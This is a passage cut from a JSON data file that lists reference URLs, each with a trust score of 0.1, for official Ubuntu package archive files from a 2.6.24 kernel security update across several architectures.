        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/nic-restricted-modules-2.6.24-18-generic-di_2.6.24.13-18.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.24/fglrx-kernel-source_8-3+2.6.24.13-18.41_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-backports-modules-2.6.24/linux-backports-modules-2.6.24-18-rt_2.6.24-18.16_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/scsi-firmware-2.6.24-18-powerpc64-smp-di_2.6.24-18.26_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/xorg-driver-fglrx-dev_7.1.0-8-3+2.6.24.13-18.41_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/scsi-firmware-2.6.24-18-generic-di_2.6.24-18.26_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.24/linux-backports-modules-2.6.24_2.6.24-18.16.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/avm-fritz-kernel-source_3.11+2.6.24.13-18.41_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-18-sparc64_2.6.24-18.26_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.24/linux-restricted-modules-2.6.24-18-rt_2.6.24.13-18.41_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/nic-restricted-modules-2.6.24-18-386-di_2.6.24.13-18.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-backports-modules-2.6.24/linux-backports-modules-2.6.24-18-openvz_2.6.24-18.16_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-18-openvz_2.6.24-18.26_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-backports-modules-2.6.24/linux-headers-lbm-2.6.24-18-powerpc64-smp_2.6.24-18.16_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.24/linux-backports-modules-2.6.24-18-generic_2.6.24-18.16_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-18-generic-di_2.6.24-18.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-18-386_2.6.24-18.32_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/nvidia-new-kernel-source_169.12+2.6.24.13-18.41_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.24/updates-modules-2.6.24-18-generic-di_2.6.24-18.16_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/universe/l/linux-backports-modules-2.6.24/linux-headers-lbm-2.6.24-18-lpiacompat_2.6.24-18.16_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.24/linux-restricted-modules-2.6.24-18-xen_2.6.24.13-18.41_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-18-powerpc_2.6.24-18.32_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/fglrx-amdcccle_2.6.24.13-18.41_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-18-386_2.6.24-18.32_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-18-386_2.6.24-18.26_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/nic-firmware-2.6.24-18-powerpc64-smp-di_2.6.24-18.26_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/scsi-firmware-2.6.24-18-sparc64-di_2.6.24-18.26_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-18-rt_2.6.24-18.32_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-18-generic_2.6.24-18.32_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/nvidia-glx-new_169.12+2.6.24.13-18.41_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-18.32.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.24/nvidia-glx-legacy-dev_71.86.04+2.6.24.13-18.41_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-18-sparc64_2.6.24-18.26_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-backports-modules-2.6.24/linux-headers-lbm-2.6.24-18-xen_2.6.24-18.16_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-18-lpia_2.6.24-18.26_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-18.32_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-18-generic-di_2.6.24-18.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/nic-restricted-firmware-2.6.24-18-386-di_2.6.24.13-18.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/universe/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-18-lpiacompat_2.6.24-18.26_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.24/updates-modules-2.6.24-18-386-di_2.6.24-18.16_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-18-openvz_2.6.24-18.26_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/restricted/l/linux-restricted-modules-2.6.24/linux-restricted-modules-2.6.24-18-powerpc64-smp_2.6.24.13-18.41_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/nvidia-glx-dev_96.43.05+2.6.24.13-18.41_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/nic-firmware-2.6.24-18-sparc64-di_2.6.24-18.26_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.24/linux-backports-modules-2.6.24-18-generic_2.6.24-18.16_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-backports-modules-2.6.24/updates-modules-2.6.24-18-sparc64-di_2.6.24-18.16_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-18-generic_2.6.24-18.26_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/nic-firmware-2.6.24-18-generic-di_2.6.24-18.26_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-18-lpia_2.6.24-18.26_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/xorg-driver-fglrx_7.1.0-8-3+2.6.24.13-18.41_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-18-generic-di_2.6.24-18.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-18-generic-di_2.6.24-18.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-18-server_2.6.24-18.32_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-18-xen_2.6.24-18.32_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-18-lpiacompat_2.6.24-18.32_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-backports-modules-2.6.24/linux-backports-modules-2.6.24-18-sparc64_2.6.24-18.16_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-18-generic-di_2.6.24-18.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-18-generic-di_2.6.24-18.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/restricted/l/linux-restricted-modules-2.6.24/nic-restricted-modules-2.6.24-18-powerpc-di_2.6.24.13-18.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-18-generic-di_2.6.24-18.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-18-openvz_2.6.24-18.26_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-18-generic-di_2.6.24-18.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-18-lpia_2.6.24-18.32_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-18-generic_2.6.24-18.26_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-18-openvz_2.6.24-18.26_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-backports-modules-2.6.24/linux-backports-modules-2.6.24-18-rt_2.6.24-18.16_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-18-rt_2.6.24-18.32_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-18-powerpc_2.6.24-18.32_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-18-generic-di_2.6.24-18.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.24/fglrx-kernel-source_8-3+2.6.24.13-18.41_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/linux-restricted-modules-2.6.24_2.6.24.13.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/nic-restricted-firmware-2.6.24-18-generic-di_2.6.24.13-18.41_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/linux-restricted-modules-2.6.24-18-generic_2.6.24.13-18.41_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/scsi-firmware-2.6.24-18-generic-di_2.6.24-18.26_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-18-server_2.6.24-18.26_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-18-generic_2.6.24-18.32_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-18-generic-di_2.6.24-18.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.24/linux-restricted-modules-2.6.24-18-openvz_2.6.24.13-18.41_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-backports-modules-2.6.24/linux-headers-lbm-2.6.24-18-openvz_2.6.24-18.16_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-18-sparc64_2.6.24-18.32_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-18.32.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.24/linux-backports-modules-2.6.24-18-server_2.6.24-18.16_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-18-powerpc64-smp_2.6.24-18.26_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-backports-modules-2.6.24/linux-backports-modules-2.6.24-18-powerpc_2.6.24-18.16_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-18-powerpc_2.6.24-18.26_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/restricted/l/linux-restricted-modules-2.6.24/linux-restricted-modules-2.6.24-18-sparc64_2.6.24.13-18.41_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-18-sparc64-smp_2.6.24-18.26_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-18-xen_2.6.24-18.32_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-18-xen_2.6.24-18.26_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-backports-modules-2.6.24/linux-headers-lbm-2.6.24-18-powerpc_2.6.24-18.16_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/linux-restricted-modules-2.6.24-18-generic_2.6.24.13-18.41_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/ubuntu-modules-2.6.24-18-generic-di_2.6.24-18.26_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/multiverse/l/linux-restricted-modules-2.6.24/linux-restricted-modules-2.6.24-18-lpiacompat_2.6.24.13-18.41_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-18-virtual_2.6.24-18.26_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/ubuntu-modules-2.6.24-18-generic-di_2.6.24-18.26_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/avm-fritz-firmware-2.6.24-18_3.11+2.6.24.13-18.41_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/nvidia-glx-new_169.12+2.6.24.13-18.41_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/ubuntu-modules-2.6.24-18-386-di_2.6.24-18.26_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-18-generic-di_2.6.24-18.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-18-xen_2.6.24-18.26_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-18.32_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/linux-restricted-modules-2.6.24-18-386_2.6.24.13-18.41_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
